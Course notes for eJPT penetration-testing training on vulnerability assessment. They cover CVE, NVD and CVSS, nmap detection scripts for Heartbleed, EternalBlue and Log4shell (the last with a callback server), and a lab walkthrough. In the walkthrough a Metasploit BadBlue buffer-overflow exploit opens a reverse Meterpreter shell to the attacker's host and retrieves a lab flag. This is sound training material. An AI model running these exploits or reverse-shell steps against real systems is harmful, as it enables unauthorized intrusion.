INE Training Notes - by syselement
🏠 Home BlogGitHub📚 Buy Me a Book
  • INE Training Notes
  • Courses
    • eJPT - PTSv2
      • 📒Penetration Testing Prerequisites
        • Introduction
        • Networking
        • Web Applications
      • 📒1. Assessment Methodologies & Auditing
        • Information Gathering
        • Footprinting & Scanning
        • Enumeration
          • 🔬SMB Enum
          • 🔬FTP Enum
          • 🔬SSH Enum
          • 🔬HTTP Enum
          • 🔬MYSQL Enum
          • 🔬SMTP Enum
        • Vulnerability Assessment
        • Auditing Fundamentals
      • 📒2. Host & Network Penetration Testing
        • System/Host Based Attacks
          • 🪟Windows Attacks
            • 🔬IIS - WebDAV
            • 🔬SMB - PsExec
            • 🔬RDP
            • 🔬WinRM
            • 🔬Win Kernel Privesc
            • 🔬UAC Bypass
            • 🔬Access Token
            • 🔬Alternate Data Stream
            • 🔬Credentials Dumping
          • 🐧Linux Attacks
            • 🔬Bash
            • 🔬FTP
            • 🔬SSH
            • 🔬SAMBA
            • 🔬Cron Jobs
            • 🔬SUID
            • 🔬Hashes Dumping
        • Network Based Attacks
          • 🔬Tshark, ARP, WiFi
        • The Metasploit Framework (MSF)
          • 🔬HFS - MSF Exploit
          • 🔬Tomcat - MSF Exploit
          • 🔬FTP - MSF Exploit
          • 🔬Samba - MSF Exploit
          • 🔬SSH - MSF Exploit
          • 🔬SMTP - MSF Exploit
          • 🔬Meterpreter - MSF
          • 🔬Win Post Exploitation - MSF
          • 🔬Linux Post Exploitation - MSF
        • Exploitation
          • 🔬Fixing Exploits - HFS
          • 🔬Win Workflow Platform - MSF
          • 🔬Win Black Box Pentest
          • 🔬Linux Black Box Pentest
        • Post-Exploitation
          • 🔬Windows Post-Exploitation
          • 🔬Windows Privilege Escalation
          • 🔬Windows Persistence
          • 🔬Linux Post-Exploitation
          • 🔬Linux Privilege Escalation
          • 🔬Linux Persistence
          • 🔬Cracking Hashes
          • 🔬Pivoting
        • Social Engineering
      • 📒3. Web Application Penetration Testing
        • Intro to Web App Pentesting
          • 🔬HTTP Enumeration
          • 🔬Web App Scanning
          • 🔬Web App Attacks
      • 🔬Exam Preparation - Labs
        • PTSv1 Prerequisites Labs
          • 🔬HTTP(S) Traffic Sniffing
          • 🔬Find the Secret Server
          • 🔬Data Exfiltration
          • 🔬Burp Suite Basics - Directory Enumeration
        • PTSv2 Practice Labs
      • 🌐eJPT References
      • 📜eJPT Cheat Sheet
    • ICCA
      • 📒1. Cloud Foundations
      • 📒2. Cloud Management Concepts
      • 📒3. Cloud Identity, Security, and Compliance
      • 🌐Icca References
    • eMAPT
      • 📒Android
      • 📒iOS
      • 🌐eMAPT References
  • 🏠syselement's Blog Home
Powered by GitBook
On this page
  • Vulnerabilities
  • Case Studies
  • Heartbleed
  • EternalBlue
  • BlueKeep
  • Log4J
  • Vulnerable Lab
  • searchsploit

Was this helpful?

Edit on GitHub
  1. Courses
  2. eJPT - PTSv2
  3. 📒1. Assessment Methodologies & Auditing

Vulnerability Assessment

Previous🔬SMTP EnumNextAuditing Fundamentals

Last updated 2 years ago

Was this helpful?

⚡ Prerequisites

  • Basic networks concepts and Cybersecurity

📕 Learning Objectives

  • Describe and recognize vulnerabilities, exposures reports and national vulnerability database submissions

  • Describe vulnerability management and perform research

  • Perform network auditing

🔬 Training list - PentesterAcademy/INE Labs

subscription required

Vulnerabilities

🗒️ A vulnerability is a weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source. When exploited, it results in a negative impact to confidentiality, integrity or availability.

  • Physical layer - e.g. people, physical controls, vaults, door locks, gates, fences, cameras, badge readers, etc. There can be vulnerabilities in those as well, exploited through social engineering techniques or hardware exploitation. for physical access.

  • Vulnerabilities on a computer comes from the operating system, systems and installed services, found by DevSec engineers, Security researchers, Pentesters, Software developers, Users.

  • - a United States government repository of standards based vulnerability management data represented using the SCAP (Security Content Automation Protocol), maintained by .

  • All vulnerabilities in the NVD have been assigned a CVE identifier.

🗒️ The program is a public glossary of vulnerabilities identified for specific code bases, software applications or open libraries, maintained by MITRE corporation. A unique CVE ID is primarily assigned by MITRE or by CNAs (CVE Numbering Authorities), allowing stakeholders, vendors and researchers to commonly identify unique or new exploits and vulnerabilities.

  • E.g. - high impact, critical vulnerabilities:

Description

Severity

References (Advisories, Solutions, Tools)

Weakness Enumeration

Known Affected Software Configurations

Scope, impact and usefulness will come down to business needs, along with the risk management and cybersecurity recommendations.

Risk Management includes vulnerability management. By doing a VA (Vulnerability Assessment), the pentester is going to define, identify, classify and prioritize security deficiencies in computer systems, applications, and network infrastructures. Some procedures to find vulnerabilities are:

  • Scanning

  • Asset Identification and Research

  • Fuzz Testing (input/handling validation)

Case Studies

Heartbleed

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET>
nmap -sV --script ssl-heartbleed -p 443 <TARGET>
# Other ports can be used too
    • ❗ always check the exploit behavior before using it

    • search for heartbleed

EternalBlue

The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.

The EternalBlue exploit developed by the NSA was leaked to public in 2017 (by Shadow Brokers hacker group).

nmap --script smb-vuln-ms17-010 -p 445 <TARGET>

BlueKeep

A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka Remote Desktop Services Remote Code Execution Vulnerability.

The vulnerability was made public by Microsoft in May 2019 and affected Windows XP, Windows Vista, Windows 7, Windows Server 2008 & R2.

It allows access to a chunk of kernel memory, allowing the attacker to remotely execute arbitary code at the system level without authentication.

  • BlueKeep PoC's (Proof of Concepts) and exploits could be malicious in nature.

Log4J

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

nmap --script log4shell.nse --script-args log4shell.callback-server=<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_HOST>

Vulnerable Lab

  • Target IP: 10.2.28.13

  • Fingerprint the application and exploit the found vulnerability

ping 10.2.28.13
nmap -sV 10.2.28.13
80/tcp    open  http               BadBlue httpd 2.7
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
  • Research the vulnerability of BadBlue httpd 2.7 using various tools:

    • Google it

Stack-based buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier allows remote attackers to execute arbitrary code via a long query string.

searchsploit - a command line search tool for Exploit-DB. A copy of Exploit Database can be used offline.

    • This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier.

msfconsole
search badblue 2.7
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.28.13
exploit
[*] Started reverse TCP handler on 10.10.24.3:4444 
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (180291 bytes) to 10.2.28.13
[*] Meterpreter session 1 opened (10.10.24.3:4444 -> 10.2.28.13:49330) at 2023-02-25 15:32:52 +0530

meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
shell
cd /
dir
type flag.txt
Reveal Flag: 🚩

70a569da306697d64fc6c19afea37d94


🗒️ The is the method used to supply a qualitative measure of severity, consisting of three metric groups: Base, Temporal and Environmental.

are vulnerabilities exploits not yet found, used or reported by anyone, or discovered by attackers before the vendor's security team has become aware of it. e.g.:

🗒️ is a network vulnerability scanning tool. It can be hosted locally and used for Vulnerability Assessment.

Show accepted ciphersuites and compressors with script.

Detect OpenSSL Heartbleed bug vulnerable servers with script, or with Metasploit enumerate module.

is useful too

Widely used in the .

Specific script

🔬 Check the

🔬 Check the

- a NSE script for Apache Log4j RCE vulnerability discovery

🔬

Search for exploits from or using a command line tool such as searchsploit

Use Metasploit to exploit the target using the

❗ Before running an exploit, ALWAYS check its to understand what it is doing❗

Use commands to find the flag

Windows: Easy File Sharing Server
NVD (National Vulnerability Database)
NIST
CVE (Common Vulnerabilities and Exposures)
CVE new website
CVE-2014-0160 - Heartbleed
CVE-2017-0143 - EternalBlue
CVE-2021-44228 - Apache Log4j
CVSS (CVE Scoring System)
Zero-day exploits
CVE-2021-301165 - Kaseya VSA exploited by REvil Ransomware
CVE-2020-1472 - Zerologon
Nessus
CVE-2014-0160 - Heartbleed
Heartbleed Vulnerability Explanation - by Rapid7
nmap ssl-enum-ciphers
nmap ssl-heartbleed
exploit-db.com
CVE-2017-0143 - EternalBlue / MS17-010
WannaCry ransomware attack
nmap smb-vuln-ms17-010
Lab 2 - Eternal Blue here
CVE-2019-0708 - BlueKeep
Lab 2 - BlueKeep here
CVE-2021-44228 - Apache Log4j
nmap-log4shell
Windows: Easy File Sharing Server
NVD - CVE-2007-6377
exploit-db.com
cvedetails.com - CVE-2007-6377
exploit-db.com
searchsploit
PassThru Buffer Overflow module
Source Code
meterpreter
CVE Page Components
exploit-db.com - heartbleed
exploit-db.com - EternalBlue
exploit-db.com - BlueKeep
exploit-db.com - Log4j
nmap scan
exploit-db.com - BadBlue
searchsploit badblue 2.7